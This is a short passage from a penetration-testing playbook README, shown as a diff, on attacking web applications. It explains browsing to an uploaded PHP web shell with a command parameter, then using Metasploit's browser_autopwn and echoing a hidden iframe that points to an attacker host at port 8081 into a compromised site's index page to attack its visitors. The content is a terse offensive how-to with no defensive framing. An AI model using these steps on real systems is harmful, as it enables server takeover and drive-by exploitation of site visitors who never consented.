hexrom/PenetrationTesting-Playbook/WebAppSec/README.md

 //If file upload doesnt check against file extension uploads, can upload file such as shell2.php and browse to that file upload location with the cmd parameter such as:
 Example: fileshare.com/avatars/shell2.php?cmd=ls

+//Once have access to Webserver, can mount client-side attacks MSF> use auxiliary/server/browser_autopwn
+This will generate a URL which can be inserted via iframe to the index page.
+Download and edit index page, reupload.

+echo '<iframe src="http://AttackerIP:8081/uo3eXen8t0I1n" width=1 height=1 style="visibility:hidden; position:absolute;"></iframe>';

+Profit?
 ```